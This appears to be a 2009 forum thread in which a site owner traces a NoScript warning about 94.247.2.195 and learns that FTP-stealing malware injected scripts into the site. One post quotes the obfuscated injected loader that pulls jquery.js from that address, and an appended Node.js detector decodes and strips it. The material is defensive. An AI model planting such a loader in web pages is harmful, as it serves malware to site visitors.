94.247.2.195

Posted: Fri Apr 17, 2009 5:42 am
by informactive
On my own web site pages I get a NoScript popup saying scripts are partially allowed and asking whether to allow or not allow 94.247.2.195.

I do a search for 94.247.2.195 and find the following.

Who are these people, and why am I being asked to allow or not allow them? I have no script on my web page.

Results for 94.247.2.195:

% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '94.247.2.0 - 94.247.3.255'

inetnum: 94.247.2.0 - 94.247.3.255
netname: ZLKON
descr: ZlKon
country: LV
admin-c: ZK508-RIPE
tech-c: DES31-RIPE
status: ASSIGNED PA
mnt-by: PCEXPRESS-MNT
mnt-lower: ZLKON-MNT
mnt-routes: ZLKON-MNT
source: RIPE # Filtered

role: ZlKon HostMaster
address: Lilijas iela 4-74
address: Riga, LV-1055
address: Latvija
phone: +371 26330593
admin-c: AD5952-RIPE
tech-c: AD5952-RIPE
nic-hdl: ZK508-RIPE
mnt-by: ZLKON-MNT
source: RIPE # Filtered
abuse-mailbox: abuse@zlkon.lv

role: DATORU EXPRESS SERVISS HostMaster
address: 18. novembra street 319C
address: Daugavpils, LV-5413
address: Latvia
phone: +371 26631339
fax-no: +371 65420725
remarks: Information: http://www.pcexpress.lv
remarks: Questions: hostmaster@pcexpress.lv
admin-c: IV745-RIPE
tech-c: IV745-RIPE
nic-hdl: DES31-RIPE
mnt-by: PCEXPRESS-MNT
source: RIPE # Filtered
abuse-mailbox: abuse@pcexpress.lv

% Information related to '94.247.0.0/21AS12553'

route: 94.247.0.0/21
descr: "DATORU EXPRESS SERVISS" Ltd.
origin: AS12553
mnt-by: PCEXPRESS-MNT
source: RIPE # Filtered

Re: 94.247.2.195

Posted: Fri Apr 17, 2009 6:04 am
by therube
URL of your website?
Do you have ads on your website?
http://www.tellinya.com or blog.5ubliminal.com ?

Re: 94.247.2.195

Posted: Fri Apr 17, 2009 6:05 am
by informactive

Re: 94.247.2.195

Posted: Fri Apr 17, 2009 6:11 am
by therube
The only thing I see is statcounter?

Re: 94.247.2.195

Posted: Fri Apr 17, 2009 6:13 am
by informactive
Lots and lots of links, pop-ups, rollovers, CSS, Expression Web; however, no ads.

Re: 94.247.2.195

Posted: Fri Apr 17, 2009 6:17 am
by therube
Looks to be malware-related, http://www.malwaredomainlist.com/mdl.ph ... uantity=50.
Run Malwarebytes' Anti-Malware (quick scan) on your computer and see what it may turn up.

Has my website been hacked?

[Full-disclosure] Statcounter Script Injection User Session Hijack

Perhaps look into using a browser and extension that make it easy to block JavaScript and can also help to prevent things like XSS exploits.

Re: 94.247.2.195

Posted: Fri Apr 17, 2009 6:45 am
by informactive
I ran the Malwarebytes quick scan and it found the below. I removed it and rebooted, and I am still being asked to allow 93.247.2.195. It's like 11:44 pm; no more for tonight. I'll be back tomorrow morning.
Thanks for helping me with this.

Malwarebytes' Anti-Malware 1.35
Database version: 1904
Windows 5.1.2600 Service Pack 3

4/16/2009 11:31:23 PM
mbam-log-2009-04-16 (23-31-23).txt

Scan type: Quick Scan
Objects scanned: 83633
Time elapsed: 6 minute(s), 10 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 1
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools (Hijack.Regedit) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

Re: 94.247.2.195

Posted: Fri Apr 17, 2009 3:17 pm
by informactive
For what it is worth, I found this link with 94.247.2.195 listed on it.

http://www.who-is-who-in-gpt.com/forum/ ... topic=4024

Re: 94.247.2.195

Posted: Fri Apr 17, 2009 3:44 pm
by informactive
The link below is but a few days old.

http://blog.scansafe.com/

It says a lot about 94.247.2.195.

thanks

Re: 94.247.2.195

Posted: Fri Apr 17, 2009 3:57 pm
by therube
So do you think it is statcounter.com that is being subverted, or your hosting company, or something else altogether?

Re: 94.247.2.195

Posted: Fri Apr 17, 2009 4:10 pm
by informactive
I have no clue.

I'll go to statcounter and give them previous link and see what they say.

Re: 94.247.2.195

Posted: Fri Apr 17, 2009 9:53 pm
by informactive
After searching and searching for a solution, I go back and review the NoScript options popup:
allow
distrust and
temporary.

I clicked on distrust and now NoScript does not popup asking me to allow, temporary or distrust.

94.247.2.195 could be somewhere in my computer; however, it could be that NoScript stopped 94.247.2.195 from taking me somewhere I did not want to go.

thanks.

Re: 94.247.2.195

Posted: Fri Apr 17, 2009 11:19 pm
by therube
it could be NoScript stopped 94.247.2.195 from taking me somewhere I did not want to go
Correct. That is what I would expect.

Leave padlockinventor blocked.
Allow statcounter.net. (Is that safe to do?)

See if the popups start again.

Re: 94.247.2.195

Posted: Tue Apr 21, 2009 9:15 pm
by WeWatchYourWebsite
We've been seeing a lot of these types of hacks lately.

It's usually caused by a virus on the computer that uploads to the website. The virus monitors FTP traffic, and since FTP usernames and passwords are sent in plain text, it can read them, log in to your website as you and add its malicious code.

You might look for something like the following on your website:

<script language=javascript><!--
document.write(unescape('%3CsT8AcrF2iT8ApWkt%20srWs9c%3DJU%2FF2%2FT8A9vo4%2EWk24T8A7%2E2vo%2E195%2FjJUqJUueryT8A%2EjsWk%3E%3C%2FsJUcrJUipt%3E').replace(/T8A|Wk|NLA|F2|6X|vo|Ws9|K3m|JU/g,""));
--></script>

The actual encoded characters might be somewhat different, but this code deobfuscates to:

<script src=//94.247.2.195/jquery.js></script>

Which is what you're claiming is being blocked.

Step 1: Change the FTP password for your site.
Step 2: Clean your computer with AVG or Avast.
Step 3: Remove the JavaScript code from your web pages. It's typically in many spots on the same web page and on multiple pages.

After changing your FTP password do not upload to your site again until you've cleaned your PC.

If you have any further questions, please email me at traef@wewatchyourwebsite.com
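As an added example, not code from this thread or from WeWatchYourWebsite, the following Node.js script finds the loader pattern quoted in the post above in a saved page, reproduces the browser's decoding step (percent-decode with unescape, then delete the junk tokens), reports which host the decoded <script src> would fetch from and whether that host is a bare IP address, and strips every matching block as Step 3 asks. The sample page is constructed for the example; the file name and the example.invalid base URL used to resolve scheme-relative src values are assumptions. The token list in the regex is not hard-coded, so it also handles the variant encodings the post says you may see.

```javascript
// Added example (not from the thread): locate, decode and strip the obfuscated
// document.write(unescape('...').replace(/junk|tokens/g,"")) loaders described above.
// Run with: node find_injected_loaders.js   (file name is an assumption)

// The loader shape quoted in the post: percent-encoded HTML, then junk tokens removed.
const LOADER_RE =
  /document\.write\(\s*unescape\(\s*'([^']*)'\s*\)\s*\.replace\(\s*\/((?:\\.|[^\/\\])*)\/([a-z]*)\s*,\s*(?:""|'')\s*\)\s*\)/;
const SCRIPT_BLOCK_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
const SRC_RE = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/i;
const BARE_IPV4_RE = /^\d{1,3}(?:\.\d{1,3}){3}$/;

// Constructed sample page: one benign counter script plus the loader quoted in the post.
const SAMPLE_PAGE = `<html><body><h1>My page</h1>
<script type="text/javascript" src="https://www.statcounter.com/counter/counter.js"></script>
<script language=javascript><!--
document.write(unescape('%3CsT8AcrF2iT8ApWkt%20srWs9c%3DJU%2FF2%2FT8A9vo4%2EWk24T8A7%2E2vo%2E195%2FjJUqJUueryT8A%2EjsWk%3E%3C%2FsJUcrJUipt%3E').replace(/T8A|Wk|NLA|F2|6X|vo|Ws9|K3m|JU/g,""));
--></script>
<p>content</p></body></html>`;

// Do exactly what the victim's browser does: percent-decode, then delete the junk tokens.
function decodeLoader(encoded, junkPattern, flags) {
  return unescape(encoded).replace(new RegExp(junkPattern, flags), "");
}

// Host the decoded <script src=...> would load from. A scheme-relative "//host/path"
// inherits the page's scheme, so resolve it against a placeholder base (assumption).
function scriptHost(decoded, pageUrl = "http://example.invalid/") {
  const m = SRC_RE.exec(decoded);
  if (!m) return null;
  return new URL(m[1], pageUrl).hostname;
}

// Scan one page; one finding per injected loader, benign script blocks are ignored.
function findInjectedLoaders(html) {
  const findings = [];
  for (const block of html.matchAll(SCRIPT_BLOCK_RE)) {
    const m = LOADER_RE.exec(block[1]);
    if (!m) continue;
    const decoded = decodeLoader(m[1], m[2], m[3]);
    const host = scriptHost(decoded);
    findings.push({ decoded, host, bareIp: host !== null && BARE_IPV4_RE.test(host) });
  }
  return findings;
}

// Step 3 from the post: drop every <script> block that contains such a loader.
// Returns the cleaned page and how many blocks were removed, so a multi-page
// clean-up can report per-file counts.
function stripInjectedLoaders(html) {
  let removed = 0;
  const cleaned = html.replace(SCRIPT_BLOCK_RE, (whole, body) => {
    if (!LOADER_RE.test(body)) return whole;
    removed += 1;
    return "";
  });
  return { cleaned, removed };
}

console.log(JSON.stringify(findInjectedLoaders(SAMPLE_PAGE), null, 2));
console.log("blocks removed:", stripInjectedLoaders(SAMPLE_PAGE).removed);
```

Decoding before matching matters: grepping the raw files for "94.247.2.195" finds nothing, because the address only exists after unescape and the token removal run. A bare-IP src on a page that otherwise loads scripts by hostname is a useful trigger on its own, even when the junk-token list changes from one infection to the next.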

Re: 94.247.2.195

Posted: Tue Apr 21, 2009 10:18 pm
by informactive
OK I'll do what you suggest.
Thanks